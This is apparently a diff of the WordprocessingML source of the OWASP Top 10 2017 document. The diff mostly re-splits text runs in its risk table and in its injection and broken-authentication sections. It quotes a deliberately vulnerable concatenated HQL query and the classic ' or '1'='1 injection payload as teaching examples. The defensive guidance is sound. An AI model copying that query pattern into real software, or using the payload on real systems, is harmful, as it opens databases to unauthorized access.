@@ -4337,10 +3894,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Where possible, the names of the risks in the Top 10 are aligned wi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>th CWE weaknesses to promote generally accepted security practices and to reduce confusion. </w:t>
+        <w:t>Where possible, the names of the risks in the Top 10 are aligned with CWE weaknesses to promote generally accepted security practices and to reduce confus</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ion. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4454,7 +4011,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>NIST Cyber Framework (US)</w:t>
+          <w:t>NIST Cyb</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>er Framework (US)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -4513,12 +4076,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="t10-owasp-top-10-application-security-ri"/>
-      <w:bookmarkStart w:id="29" w:name="_Toc496378419"/>
+      <w:bookmarkStart w:id="28" w:name="t10-owasp-top-10-2017-application-securi"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc496437897"/>
       <w:bookmarkEnd w:id="28"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>T10 OWASP Top 10 Application Security Risks – 2017</w:t>
+        <w:t>T10 OWASP Top 10 2017 Application Security Risks</w:t>
       </w:r>
       <w:bookmarkEnd w:id="29"/>
     </w:p>
@@ -4621,10 +4184,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementatio</w:t>
-            </w:r>
-            <w:r>
-              <w:t>n flaws to assume other users’ identities (temporarily or permanently).</w:t>
+              <w:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (tempo</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rarily or permanently).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4652,10 +4215,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakl</w:t>
-            </w:r>
-            <w:r>
-              <w:t>y protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</w:t>
+              <w:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, i</w:t>
+            </w:r>
+            <w:r>
+              <w:t>dentity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4670,10 +4233,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">A4:2017 XML External Entity </w:t>
-            </w:r>
-            <w:r>
-              <w:t>(XXE)</w:t>
+              <w:t>A4:2017 XML External Entity (XXE)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4686,10 +4246,13 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, inter</w:t>
-            </w:r>
-            <w:r>
-              <w:t>nal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.</w:t>
+              <w:t>Many older or poorly configured XML proces</w:t>
+            </w:r>
+            <w:r>
+              <w:t>sors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and de</w:t>
+            </w:r>
+            <w:r>
+              <w:t>nial of service attacks, such as the Billion Laughs attack.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4717,10 +4280,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these fla</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.</w:t>
+              <w:t>Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or d</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ata, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4748,13 +4311,13 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Security misconfiguration is the most common issue in t</w:t>
-            </w:r>
-            <w:r>
-              <w:t>he data, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, f</w:t>
-            </w:r>
-            <w:r>
-              <w:t>rameworks, dependencies, and components in a timely fashion (or at all).</w:t>
+              <w:t>Security misconfiguration is the most common issue in the data, which is due in part to manual or ad ho</w:t>
+            </w:r>
+            <w:r>
+              <w:t>c configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a tim</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ely fashion (or at all).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4782,10 +4345,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</w:t>
+              <w:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser AP</w:t>
+            </w:r>
+            <w:r>
+              <w:t>I that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4813,10 +4376,13 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Insecure deserialization flaws occur when an application receives hostile serialized objects. Inse</w:t>
-            </w:r>
-            <w:r>
-              <w:t>cure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered or deleted to spoof users, conduct injection attacks, and elevate privileges.</w:t>
+              <w:t xml:space="preserve">Insecure deserialization flaws occur </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered or deleted to spoof users, </w:t>
+            </w:r>
+            <w:r>
+              <w:t>conduct injection attacks, and elevate privileges.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4831,10 +4397,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>A9:2017 U</w:t>
-            </w:r>
-            <w:r>
-              <w:t>sing Components with Known Vulnerabilities</w:t>
+              <w:t>A9:2017 Using Components with Known Vulnerabilities</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4847,10 +4410,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or se</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">rver takeover. </w:t>
+              <w:t>Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exp</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">loited, such an attack can facilitate serious data loss or server takeover. </w:t>
             </w:r>
             <w:r>
               <w:lastRenderedPageBreak/>
@@ -4870,7 +4433,10 @@
             </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>A10:2017 Insufficient Logging &amp; Monitoring</w:t>
+              <w:t>A10:2017 Insufficient Logging &amp; Monito</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ring</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4883,13 +4449,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Insufficient logging and monitoring, coupled with missin</w:t>
-            </w:r>
-            <w:r>
-              <w:t>g or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract or destroy data. Most breach studies show time to detect a breach is over 200 days, typically d</w:t>
-            </w:r>
-            <w:r>
-              <w:t>etected by external parties rather than internal processes or monitoring.</w:t>
+              <w:t>Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract or destroy data. Most breach studies sh</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ow time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4900,7 +4463,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="30" w:name="a12017-injection"/>
-      <w:bookmarkStart w:id="31" w:name="_Toc496378420"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc496437898"/>
       <w:bookmarkEnd w:id="30"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -5022,7 +4585,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Almost any source of data can be an injection vector, including users, parameters, external and internal web services, and all types of users. </w:t>
+              <w:t>Almos</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">t any source of data can be an injection vector, including users, parameters, external and internal web services, and all types of users. </w:t>
             </w:r>
             <w:hyperlink r:id="rId34">
               <w:r>
@@ -5033,10 +4599,10 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> occur when an attacker can send</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> hostile data to an interpreter. </w:t>
+              <w:t xml:space="preserve"> occur when an attacker can send hos</w:t>
+            </w:r>
+            <w:r>
+              <w:t>tile data to an interpreter. </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5049,10 +4615,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, ORM queries. Injection flaws are ea</w:t>
-            </w:r>
-            <w:r>
-              <w:t>sy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</w:t>
+              <w:t>Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, ORM queries. Injection flaws are easy t</w:t>
+            </w:r>
+            <w:r>
+              <w:t>o discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5065,10 +4631,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover. The busi</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ness impact depends on the protection needs of your application and data.</w:t>
+              <w:t>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover. The business</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5113,10 +4679,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Hostile data is used directl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y with dynamic queries or non-parameterized calls for the interpreter without context-aware escaping.</w:t>
+        <w:t>Hostile data is used directly with dynamic queries or non-parameterized calls for the interpreter without context-aware escaping.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5140,10 +4703,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Hostile data is directly used or</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or in stored procedures.</w:t>
+        <w:t>Host</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or in stored procedures.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5151,13 +4714,13 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Some of the more common injections are SQL, OS command, ORM, LDAP, and Expression Language (EL) or OGNL injection.. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>The concept is identical between all interpreters. Organizations can include SAST and DAST tooling into the CI/CD pipeline to alert if existing or newly checked in code has injection prior to production deployment. Manual and automated source code review i</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s the best method of detecting if you are vulnerable to injections, closely followed by thorough DAST scans of all parameters, fields, headers, cookies, JSON, and XML data inputs.</w:t>
+        <w:t>Some of the more common injections are SQL, OS command, ORM, LDAP, and Expression Langua</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ge (EL) or OGNL injection.. The concept is identical between all interpreters. Organizations can include SAST and DAST tooling into the CI/CD pipeline to alert if existing or newly checked in code has injection prior to production deployment. Manual and au</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tomated source code review is the best method of detecting if you are vulnerable to injections, closely followed by thorough DAST scans of all parameters, fields, headers, cookies, JSON, and XML data inputs.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5175,10 +4738,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Preventing injection requires keeping data separ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ate from commands and queries.</w:t>
+        <w:t>Preventing injection</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> requires keeping data separate from commands and queries.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5199,10 +4762,10 @@
         <w:t>NB</w:t>
       </w:r>
       <w:r>
-        <w:t>: When parameterized, stored procedures can still</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> introduce SQL injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().</w:t>
+        <w:t>: When parameterized,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> stored procedures can still introduce SQL injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5214,10 +4777,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Positive or "white list" input validation, but this is not a complete defense as many applications require special charact</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ers, such as text areas or APIs for mobile applications</w:t>
+        <w:t>Positive or "white list" input validation, but this is not a complete defense as many applications require special characters, such as text areas or APIs for mobile applications</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5229,10 +4789,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL st</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ructure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report writing software.</w:t>
+        <w:t>For any residual dynamic queries, escape special characters using the specific</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a common issue in report writing software.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5245,10 +4808,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Use LIMIT and other SQL controls within queries to prevent mass disclosure of r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ecords in case of SQL injection.</w:t>
+        <w:t>Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5272,7 +4832,10 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: An application uses untrusted data in the construction of the following vulnerable SQL call:</w:t>
+        <w:t>: An application uses untrusted data in the construction of the f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ollowing vulnerable SQL call:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5297,7 +4860,10 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)):</w:t>
+        <w:t>: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Que</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ry Language (HQL)):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5308,36 +4874,36 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'</w:t>
-      </w:r>
+        <w:t>Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>In both cases, the attacker modifies the 'id’ parameter value in her browser to send: ' or '1'='1. For example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>In both cases, the attacker modifies the 'id’ parameter value in her browser to send: ' or '1'='1. For example:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-      </w:pPr>
+        <w:t>http://example.com/</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>http://example.com/app/accountView?id=' or '1'='1</w:t>
+        <w:t>app/accountView?id=' or '1'='1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5345,10 +4911,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>This changes the meaning of both queries to return all the records from the accounts table</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. More dangerous attacks could modify data or even invoke stored procedures.</w:t>
+        <w:t>This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5457,13 +5020,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWA</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>SP Cheat Sheet: SQL Injection Prevention</w:t>
+          <w:t>OWASP Cheat Sheet: SQL Injection Prevention</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -5558,7 +5115,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-89 SQL Injection</w:t>
+          <w:t xml:space="preserve">CWE-89 </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>SQL Injection</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -5618,7 +5181,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="38" w:name="a22017-broken-authentication"/>
-      <w:bookmarkStart w:id="39" w:name="_Toc496378421"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc496437899"/>
       <w:bookmarkEnd w:id="38"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -5650,10 +5213,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Threat agen</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ts/Attack vectors</w:t>
+              <w:t>Threat agents/Attack vectors</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5743,7 +5303,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force and dictionary attack tools, and advanced GPU cracking tools.</w:t>
+              <w:t>Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force and dictionary attack tools, and advanced GPU cr</w:t>
+            </w:r>
+            <w:r>
+              <w:t>acking tools.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5756,13 +5319,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>The prevalence of b</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">roken authentication is widespread due to the design and implementation of most identity and access management systems. Attackers can detect broken authentication using manual means, but are often attracted by password dumps, or after a social engineering </w:t>
-            </w:r>
-            <w:r>
-              <w:t>attack such as phishing or similar. </w:t>
+              <w:t>The prevalence of broken authentication is widespread due to the design and implementation of most identity and access management systems. Attackers can detect broken authentication using manual means, but are often attracted by password dump</w:t>
+            </w:r>
+            <w:r>
+              <w:t>s, or after a social engineering attack such as phishing or similar. </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5775,10 +5335,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Attackers only have to gain access to a few accounts, or just one admin  account to compromise the system. Depending on the domain of the app, this may allow money laundering social security fraud and identity theft; or</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> disclose legally protected highly sensitive information.</w:t>
+              <w:t>Attackers only have to gain access to a few accounts, or just one admin  account to compromise the system. Depending on the domain of the app, this may allow money laundering social secu</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rity fraud and identity theft; or disclose legally protected highly sensitive information.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5799,14 +5359,14 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Confirmation of the user's identity, authentication, and session management are critical for separating malicious unauthenticated attackers from authorized users.</w:t>
+        <w:t>Confirmation of the user's identity, authentication, and session management are critical for separating malicious unauthenticated at</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tackers from authorized users.</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Yo</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u may have authentication weaknesses if your application:</w:t>
+        <w:t>You may have authentication weaknesses if your application:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5829,7 +5389,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, which is where the attacker has a list of valid usernames and passwords.</w:t>
+        <w:t>, which is where the attacker has a list of valid usernames and pas</w:t>
+      </w:r>
+      <w:r>
+        <w:t>swords.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5865,10 +5428,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Uses weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> be made safe.</w:t>
+        <w:t>Uses weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", whic</w:t>
+      </w:r>
+      <w:r>
+        <w:t>h cannot be made safe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5914,7 +5477,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Do not ship or deploy with any default credentials, particularly for admin users</w:t>
+        <w:t>Do not ship or depl</w:t>
+      </w:r>
+      <w:r>
+        <w:t>oy with any default credentials, particularly for admin users</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5934,7 +5500,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, such as Argon2 or PBKDF2, with sufficient work factor to prevent realistic GPU cracking attacks.</w:t>
+        <w:t>, such as Argon2 or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> PBKDF2, with sufficient work factor to prevent realistic GPU cracking attacks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5980,7 +5549,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> or other modern, evidence based password policies</w:t>
+        <w:t xml:space="preserve"> or other modern, e</w:t>
+      </w:r>
+      <w:r>
+        <w:t>vidence based password policies</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6004,10 +5576,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Where possible, implement multi-factor authentication</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to prevent credential stuffing, brute force, automated, and stolen credential attacks</w:t>
+        <w:t>Where possible, implement multi-factor authentication to prevent credent</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ial stuffing, brute force, automated, and stolen credential attacks</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6066,10 +5638,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, is a common attack. If an application does not rate limit authentication att</w:t>
-      </w:r>
-      <w:r>
-        <w:t>empts, the application can be used as a password oracle to determine if the credentials are valid.</w:t>
+        <w:t>, is a common attack. If an application does not rate limit authentic</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ation attempts, the application can be used as a password oracle to determine if the credentials are valid.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6083,10 +5655,10 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</w:t>
+        <w:t>: Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rota</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tion and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6100,10 +5672,7 @@
         <w:t>Scenario #3</w:t>
       </w:r>
       <w:r>
-        <w:t>: Insecure password storage (including plain te</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">xt, reversibly encrypted passwords, and weakly hashed passwords (such as using MD5/SHA1 with or without a salt) can lead to breaches. A recent effort by a small group of researchers cracked </w:t>
+        <w:t xml:space="preserve">: Insecure password storage (including plain text, reversibly encrypted passwords, and weakly hashed passwords (such as using MD5/SHA1 with or without a salt) can lead to breaches. A recent effort by a small group of researchers cracked </w:t>
       </w:r>
       <w:hyperlink r:id="rId55">
         <w:r>
@@ -6114,7 +5683,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, including long passwords. Instead use modern hashing algorithms such as Argon2, with salting and sufficient work factor to prevent the use of rainbow tables, word lists, etc.</w:t>
+        <w:t>, including long passwords. Instead use modern hashing algorithms such as Argon2, with salting and sufficient work factor to prevent</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the use of rainbow tables, word lists, etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6124,10 +5696,7 @@
       <w:bookmarkStart w:id="43" w:name="references-2"/>
       <w:bookmarkEnd w:id="43"/>
       <w:r>
-        <w:t>Re</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ferences</w:t>
+        <w:t>References</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6153,7 +5722,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Proactive Controls - Implement Identity and Authentication Controls</w:t>
+          <w:t>OWASP Proactive Controls - Implement Identity and Authenticat</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>ion Controls</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -6204,7 +5779,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Testing Guide: Identity</w:t>
